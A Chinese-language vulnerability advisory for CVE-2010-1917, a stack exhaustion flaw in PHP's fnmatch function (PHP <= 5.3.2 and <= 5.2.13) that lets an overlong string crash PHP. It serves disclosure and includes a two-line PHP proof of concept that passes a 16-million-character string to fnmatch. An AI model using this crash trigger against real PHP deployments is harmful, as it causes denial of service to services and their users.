发布日期：2010-05-12
更新日期：2010-05-14

受影响系统：

PHP PHP <= 5.3.2
PHP PHP <= 5.2.13

描述：

---

CVE ID: CVE-2010-1917

PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。

远程攻击者可以通过向PHP的fnmatch函数提交超长的字符串参数耗尽栈资源，导致PHP崩溃。

<*来源：Stefan Esser （s.esser@ematters.de）
  
  链接：http://www.php-security.org/2010/05/11/mops-2010-021-php-fnmatch-stack-exhaustion-vulnerability/index.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php
$a57 = str_repeat("A", 16000000);
$a265 = fnmatch($a57, "");
?>

建议：

---

厂商补丁：

PHP
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.php.net

浏览次数：2080
严重程度：0（网友投票）